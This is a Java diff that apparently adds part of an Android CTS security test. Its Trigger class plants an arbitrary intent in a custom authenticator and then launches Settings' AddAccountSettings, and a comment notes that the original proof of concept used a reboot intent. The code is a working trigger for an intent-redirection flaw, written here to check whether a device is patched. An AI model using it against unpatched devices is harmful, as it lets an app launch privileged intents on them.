+public class Trigger {
+    private static final String TAG = "TAG_2021_0921.Triggger";
+    private Context mContext;
+
+    public Trigger(Context context) {
+        mContext = context;
+    }
+
+    public void accountSettings() {
+        Log.d(TAG, "accountSettings() start");
+
+        //replaces intent.setAction(Intent.ACTION_REBOOT) in original Poc
+        Intent arbitraryIntent = new Intent(mContext, TestActivity.class);
+
+        //Patched device is not supposed to process that intent
+        Authenticator.mIntent = arbitraryIntent;
+
+        Intent intent = new Intent();
+        intent.setComponent(new ComponentName(
+                "com.android.settings",
+                "com.android.settings.accounts.AddAccountSettings"));
+        intent.setAction(Intent.ACTION_RUN);
+        intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+        String authTypes[] = {"android.security.cts"};
+
+        intent.putExtra("account_types", authTypes);
+        mContext.startActivity(intent);
+        Log.d(TAG, "accountSettings() end");
+    }
+}